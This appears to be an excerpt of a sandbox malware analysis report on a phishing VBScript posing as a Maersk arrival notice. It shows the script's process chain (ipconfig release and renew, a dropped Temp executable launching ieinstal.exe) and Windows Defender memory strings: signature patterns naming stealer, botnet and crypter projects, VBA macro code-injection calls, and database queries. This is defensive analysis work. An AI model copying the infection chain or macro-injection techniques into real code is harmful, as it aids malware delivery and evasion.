Source: MpSigStub.exe, 00000026.00000003.18343744956.00000138BDFFA000.00000004.00000001.sdmp	Binary or memory string: \Simplesso.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: <\ALLROUND STEALER\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	Binary or memory string: -powerword\PowerWord.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 4/.+\\My Botnet( Source)?\\Server\\Project1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	Binary or memory string: \Bonus 1.5.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: C:\\Users\\GavaLarr\\Desktop\\Windows\\prjSchool.vbp
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Cactilio - Joiner.+\\Src\\Stub\\YvcGVCI.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: 6@*\AC:\server\Tarantula.vbp
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: hider\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	Binary or memory string: ysp\ysp.vbp
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	Binary or memory string: >\YPKISS~1\ULTIMA~1\ULTIMA~1.VBP
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	Binary or memory string: .+:\\.+\\Desktop\\Yeni Klas.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: <7.+:\\.+\\Desktop\\Codes\\Registro dll\\RegistroDll.vbp
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	Binary or memory string: .VBProject.VBComponents("ThisDocument").CodeModule.AddFromString
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: \|C:\Documents and Settings\Diego\Desktop\gold hack\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	Binary or memory string: .+:\\SO_GF\\puxador\\office.vbp
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	Binary or memory string: fzx9823.vbp
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	Binary or memory string: 1.VBProject.VBComponents(1).CodeModule.insertlines
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	Binary or memory string: A*\AC:\Users\Joke_codder\Desktop\RSRS\fvgbhncfvgbhnjm.vbpx
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	Binary or memory string: 72C:\\Program Files\\jarrcod\\mesopotamia_cellt.vbp
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	Binary or memory string: ,'.+:\\afron\\Loader.*VB.+\\Project1.vbp
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	Binary or memory string: .+\\Cyborg-Crypt-Source\\634z7\\Projekt1\.vbp
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	Binary or memory string: `@*\AC:\PiElcestial-udtools-net-indetectables.vbp

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe' /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe /q WD
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\2108938D-9908-3C7F-FAE2-83F1B0D584D6.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Source: C:\Windows\System32\wevtutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig.exe /release
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\ipconfig.exe 'C:\Windows\System32\ipconfig.exe' /renew
Source: C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Users\user\AppData\Local\Temp\AZTEKERNES.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe /stub 1.1.18500.10 /payload 1.351.237.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-25cd2963.exe /q WD
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe	Process created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe /stub 1.1.18500.10 /payload 4.18.2109.6 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-77b29277.exe

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582F118 LookupPrivilegeValueW,GetCurrentProcess,CloseHandle,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,

Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileLowFiAsync(Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp) VALUES(?, ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AnomalyInfo(Key, UnbiasedTime) VALUES (?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(13, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM AutoFeatureControl;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT DISTINCT TableName FROM AnomalyTables;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key FROM FileHashes WHERE FileHashes.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM RansomwareDetections;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM NetworkIpFirewallRules;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RollingQueuesValues(EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime, UpdateTime FROM AtomicCounters WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n FROM FileHashes WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM FileLowFiAsync;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID from RecordIdentifier WHERE Key = ? AND RecordTimeStamp = ? ;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(14, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(6, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18268996153.00000138AEB7A000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(4, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, Name, Capacity, TimeToLive, Mode FROM RollingQueuesTables WHERE Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileStartupActions(FilePathHash, FilePath, ActionFlags, ProcessStartCount, FdrFlags, FdrThreatRecordId, EvaluatorThreatRecordId, TrustedInstallerThreatRecordId, LFRThreatRecordId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(5, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO RansomwareDetections(Key, DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(12, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT PersistId, PersistIdBlob, ExpirationDate FROM AmsiFileCache WHERE ExpirationDate < DateTime(?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, RecordTimeStamp, Generation FROM RecordIdentifier WHERE RecordIdentifier.ID IN (SELECT FileInstance.RecordID from FileInstance WHERE FileInstance.ParentRecordID = ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT RuleAction, RuleId, IsAudit, IsInherited, State FROM BmHipsRuleInfo WHERE ProcessInfoId = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, FirewallRuleName, ExpiryTime FROM NetworkIpFirewallRules WHERE ExpiryTime < ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemFileCache;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SdnEx;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(3, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO FileInstance(InstanceTimeStamp, RecordID, ScanID, TrackingEnabled, StorageEvent, StorageEventState, ModificationsCount, ParentRecordID, Parent_FileEvent, Parent_FileName, Parent_ProcessID, Remote_ProcessID, FileID, FileName, USN, CreateTime, LastAccessTime, LastWriteTime, Signer, SignerHash, Issuer, SigningTime, MOTW, MOTWFromParent,IsValidCert, CertInvalidDetails, IsCatalogSigned) VALUES(?, ? , ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ? , ? , ? , ? , ? , ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT EntryTable, EntryKey, EntryValue, InsertTime, ExpireTime FROM RollingQueuesValues WHERE EntryTable = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Version, Current, LastUpdated FROM SQLiteGlobals WHERE Current = 1 ORDER BY Version DESC ;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM AmsiFileCache WHERE AmsiFileCache.PersistId = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AttributeCounts(Key, Name, Count, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(28, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID from File WHERE SHA1 = ? ;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO ScanInfo(SigSeq, PersistSigSeq, ProgenitorPersistSigSeq, ScanAgent, NamedAttributes, PeAttributes, SigAttrEvents, ScanReason, WebURL, EngineID, SigSha) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? );
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM Engine WHERE EngineVersion = ? AND SigVersion = ? ;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AmsiFileCache(PersistId, PersistIdBlob, ExpirationDate) VALUES (?, ?, DateTime('now', ?));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AttributePersistContext;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Count(1) FROM SystemRegistryCache;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(24, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(11, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(31, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO DynSigRevisions(Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);SELECT Count(1) FROM DynSigRevisions;DELETE FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;SELECT Key, SdnRevision, EsuRevision, BFRevision, EntCertRevision, TamperRevision, AGBlobRevision, BFFileAllowRevision, BFFileBlockRevision, BFCertAllowRevision, BFCertBlockRevision FROM DynSigRevisions WHERE Key = ?SELECT ID FROM DynSigRevisions WHERE DynSigRevisions.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;
Source: MpSigStub.exe, 00000026.00000003.18252515965.00000138ADB0C000.00000004.00000001.sdmp	Binary or memory string: SELECT 1 FROM SQLITE_MASTER WHERE type=? AND name=? LIMIT 1;Engine.MetaStore.DBVaultUtilizationMpDisableTaskSchedCmdLineScanMb=Lk
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT ID FROM AutoFeatureControl WHERE AutoFeatureControl.Key = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO AnomalyTables(Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_) VALUES(? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(16, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(8, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(26, 1, date('now'));
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT Key, TableKey, TableName, KeyName, FirstSeen, LastSeen, UnbiasedMinutes, Value, Order_ FROM AnomalyTables WHERE AnomalyTables.TableKey = ?;
Source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp	Binary or memory string: SELECT COUNT(1) FROM AnomalyTables;
